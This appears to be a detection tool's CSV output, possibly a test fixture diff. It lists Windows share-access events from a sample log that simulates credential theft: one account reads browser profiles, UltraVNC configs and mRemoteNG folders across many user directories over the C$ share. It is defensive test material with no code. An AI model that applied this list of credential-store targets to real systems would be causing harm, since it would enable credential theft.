+2021-12-12 20:53:15.862 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.909 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:15.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
